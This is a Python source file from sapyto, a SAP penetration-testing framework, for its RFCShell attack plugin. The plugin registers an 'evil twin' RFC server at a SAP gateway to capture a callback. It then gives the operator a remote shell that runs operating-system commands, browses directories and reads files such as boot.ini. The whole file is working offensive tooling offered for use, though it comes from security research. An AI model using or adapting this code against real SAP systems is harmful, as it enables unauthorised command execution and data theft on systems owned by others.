# -*- coding: latin-1 -*-
'''
RFCShell.py

Copyright 2007 Mariano Nuez Di Croce @ CYBSEC

This file is part of sapyto, http://www.cybsec.com/EN/research/tools/sapyto.php

sapyto is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.

sapyto is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with sapyto; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
'''
from core.basePlugins.baseShellPlugin import baseShellPlugin
import core.kb.knowledgeBase as kb
import core.output.outputManager as om
import saprfcutil
from saprfc import *
from core.misc import *
import core.sapytoCore as core
import core.rfc.rfcShell as rs

#RFCShell imports
import core.rfc.rfcServer as rfcServer
import core.rfc.callBackHandlers.rfcShellCBH as rfcShellCBH

import xml.dom.minidom

class RFCShell(baseShellPlugin):
	'''
		Sets up a evil twin RFC server and tries to spawn a RFC shell through callback.
	
	@author: Mariano Nuez Di Croce <mnunez@cybsec.com>
	'''
	def __init__( self):
		baseShellPlugin.__init__(self)
		self._menu = {'help':self._help, 'run':self._run, 'cd':self._cd, 'dir':self._dir, 'read':self._readFile, 'set':self._set, 'view':self._view, 'start':self._start, 'back':self._back, 'exit':self._back, 'pwd':self._pwd}
		self._Options = {}
		self._rs = None
		self._tpname = 'sapyto.sapyto'
		self._type = 'callback'
		self._sapyto = core.sCore
	
	def sh( self ):
		'''
		Starts the shell's main loop.
		
		@return: The prompt
		'''
		prompt = 'sapyto/attack/RFCShell>>> '
		self._parseXML(self.getOptionsXML())
		self._mainloop( prompt )		
	
	def _parseXML( self, xmlString ):
		'''
		Parses the XML Options from a plugin.
		'''
		xmlString.replace( '\t' , '' )
		xmlDoc = xml.dom.minidom.parseString( xmlString )
		
		def setParameter( optionName, tag ):
			try:
				self._Options[ optionName ][ tag ] = option.getElementsByTagName(tag)[0].childNodes[0].data
			except:
				self._Options[ optionName ][ tag ] = ''
				
		for option in xmlDoc.getElementsByTagName('Option'):
			
			optionName = option.getAttribute('name')
			self._Options[ optionName ] = {}
			
			setParameter( optionName, 'default' )
			setParameter( optionName, 'desc' )
			setParameter( optionName, 'help' )
			setParameter( optionName, 'type' )
			
		xmlDoc.unlink()
	
	def _set( self , parameters):
		'''
		Configure a value.
		'''
		if len( parameters ) < 2:
			om.out.console('Invalid call to set, please see the help:')
			self._help( ['set'] )
		else:
			param = parameters[0]
			value = parameters[1:]
			value = ' '.join( value )
			if param in self._Options.keys():
				self._Options[ param ]['default'] = value
			else:
				om.out.console( 'Unknown parameter.' )
		return True

	def _view( self , parameters):
		'''
		List all configurable parameters of a plugin.
		'''
		self.mprint('Parameter','Value')
		self.mprint('=========','=====')
		for value in self._Options.keys():
			self.mprint(value,self._Options[value]['default'])
		return True
	
	
	def _exec( self, command ):
		'''
		Executes a user input.
		'''
		command, parameters = self._parse( command )
		
		if command in self._menu.keys():
			func = self._menu[command]
			try:
				res = func(parameters)
			except sapytoException,e:
				om.out.console( str(e) )
			else:
				return res
		else:
			om.out.console( 'command not found' )
		return True
		
	def _help( self, parameters ):
		'''
		Prints a help message to the user.
		'''
		if len(parameters) == 0:
			om.out.console('The following commands are available:')
			self.mprint('help','You are here.')
			self.mprint('set' ,'Set a parameter value.')
			self.mprint('view','List all configuration parameters and current values.')
			self.mprint('start','Starts attack.')
			self.mprint('run','Run operating system command.')
			self.mprint('dir','List directory.')
			self.mprint('cd','Change to directory.')
			self.mprint('read','Read file.')
			self.mprint('back','Return to previous menu.')
		else:
			if len( parameters ) == 1:
				if parameters[0] == 'run':
						om.out.console( 'Run operating system command.')
						om.out.console( 'Sintax: run command parameters')
						om.out.console( 'Example: run net user ')
				elif parameters[0] == 'dir':
						om.out.console( 'List directory.')
						om.out.console( 'Sintax: dir directory')
						om.out.console( 'Example: dir /home/ ')
				elif parameters[0] == 'cd':
						om.out.console( 'Change directory.')
						om.out.console( 'Sintax: cd directory')
						om.out.console( 'Example: cd /home/ ')
				elif parameters[0] == 'read':
						om.out.console( 'Read file.')
						om.out.console( 'Sintax: read absolute/path/to/file')
						om.out.console( 'Example: read c:\boot.ini')
				else:
						om.out.console( 'help not found.')
		return True
	
	def getOptionsXML(self):
		return '<?xml version="1.0" encoding="ISO-8859-1"?>\
		<OptionList>\
		<Option name="type">\
				<default>callback</default>\
				<desc>Type of RFCShell [callback | r3]</desc>\
				<type>String</type>\
		</Option>\
		<Option name="tpname">\
				<default>sapyto.sapyto</default>\
				<desc>External Server tpname</desc>\
				<type>String</type>\
		</Option>\
		</OptionList>\
		'
		
	def setOptions( self, OptionList ):
		'''
		This method sets all the options that are configured using the user interface 
		generated by the framework using the result of getOptionsXML().
		
		@parameter OptionList: A dictionary with the options for the plugin.
		@return: No value is returned.
		'''	
		if 'type' in OptionList.keys(): 
			self._type = OptionList['type']
		if 'tpname' in OptionList.keys(): 
			self._tpname = OptionList['tpname']
		
	def run( self ):
		# TODO: Validate Targets and use of sapinfo
		# TODO: Validate if RFC_REMOTE_EXEC or RFC_REMOTE_PIPE, depending on OS
		om.out.debug('Inside RFCShell plugin...')
		self.sh()
	
	def _start(self, parameters):
		om.out.information('Starting RFCShell callback attack...')
		if self._type == 'r3':
			# TODO: Straigth RFCShell 
			pass
		else:
			# Callback attack
			# Get information about connection and register an Evil Twin RFC Server.
			target = self._sapyto.getTarget()
			if self._conn.type == '3':
				# Connection was defined for a R3 connection. Use ASHOST as GWHOST.
				gwhost = self._conn.ashost
				gwserv = target['gwserv']
			elif self._conn.type == 'E':
				gwhost = self._conn.gwhost
				gwserv = self._conn.gwserv # TODO: Validate better
			else:
				om.out.information('Not supported')
				return
			tpname = self._tpname
			om.out.information('Remember to use another sapyto to stick to original client!')
			om.out.information('Registering Evil Twin \'' + tpname + '\' at ' + gwhost)
			# Register Evil Twin
			reg = rfcServer.rfcServer(gwhost,gwserv, tpname, justForCallback=True)
			# We define a rfcShell Callback Handler for Global Handler (con rima!)
			cb = rfcShellCBH.rfcShellCBH()
			cb.setCore(self._sapyto)
			cb.setCommands(self._commands)
			reg.setGlobalHandler(cb)
			conn = None
			try:
				conn = reg.register()
			except:
				# TODO: Validate connection errors
				pass
			om.out.information('A call was received! Starting RFCShell. You may now start typing commands')
			self._rs = rs.rfcShell(conn)
		return True
	
	def _run( self , parameters):
		if not self._rs:
			om.out.information('No RFCShell attached. Call \'start\' first')
		else:
			res = self._rs.runCmd(' '.join(parameters))
			om.out.information(res)
		return True
	
	def _cd( self , parameters):
		if not self._rs:
			om.out.information('No RFCShell attached. Call \'start\' first')
		else:
			self._rs.cd(' '.join(parameters))
		return True
	
	def _dir( self , parameters):
		if not self._rs:
			om.out.information('No RFCShell attached. Call \'start\' first')
		else:
			res = self._rs.listDir(' '.join(parameters))
			om.out.information(res)
		return True
	
	def _readFile( self , parameters):
		if not self._rs:
			om.out.information('No RFCShell attached. Call \'start\' first')
		else:
			res = self._rs.readFile(' '.join(parameters))
			om.out.information(res)
		return True
	
	def _back( self, parameters ):
		if self._rs:
			self._rs.disconnect()
			om.out.information('Disconnected from RFCShell.')
		return False
	
	def _pwd(self, parameters):
		if not self._rs:
			om.out.information('No RFCShell attached. Call \'start\' first')
		else:
			om.out.information('Current directory is: ' + self._rs.getPath())

	
